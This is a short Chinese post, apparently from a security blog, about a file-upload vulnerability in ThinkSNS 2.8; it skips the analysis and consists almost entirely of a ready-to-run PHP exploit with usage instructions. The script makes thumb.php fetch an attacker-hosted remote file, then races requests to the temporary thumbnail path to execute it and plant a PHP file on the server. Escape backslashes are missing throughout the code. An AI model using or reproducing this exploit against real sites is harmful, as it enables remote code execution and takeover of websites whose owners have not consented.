Thinksns 2.8 文件上传漏洞分析&完美利用

作者：wepeng
存在漏洞的版本为：最新的2.8稳定版。
漏洞分析省略。
Exploit文件内容如下：

<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $port, $headers) {
        $fp = fsockopen($host, $port);
        if (!$fp) die('Connection -> fail');
        fputs($fp, $headers);
        return $fp;
}

function http_recv($fp) {
        $ret="";
        while (!feof($fp))
                $ret.= fgets($fp, 1024);
        fclose($fp);
        return $ret;
}


print "n#  ThinkSns Arbitrary File Upload   #n";
print "# Discovered by 韦鲲鹏 #nn";

if ($argc < 4) {
        print "Usage:   php <host> <path> <romote_url>n";
        print "Example: php localhost /thinksns/ http://localhost/test/123.phpn";
        die();
}

$host = $argv[1];
$path = $argv[2];
$url = $argv[3];
$i=0;

//上传数据包
$headers_up = "GET {$path}thumb.php?url=".$url." HTTP/1.1rn";
$headers_up .= "Host: ".$host."rn";
$headers_up .= "Connection: closernrn";
echo $headers_up;


//临时文件访问数据包
$headers = "GET {$path}data/thumb_temp/".md5($url).strrchr($url,".")." HTTP/1.1rn";
$headers .= "Host: ".$host."rn";
$headers .= "Connection: closernrn";

echo $headers;

while(++$i<10) {
        fclose(http_send($host, 80, $headers));
}

fclose(http_send($host, 80, $headers_up));

while(++$i<50) {
        fclose(http_send($host, 80, $headers));
}

$headers = "GET {$path}data/thumb_temp/img.php HTTP/1.1rn";
$headers .= "Host: ".$host."rn";
$headers .= "Connection: closernrn";

$res=http_recv(http_send($host, 80, $headers));
if(preg_match('/200 OK/',$res)) {
        print "Success!nn";
} else {
        print "Fail!nn";
}

?>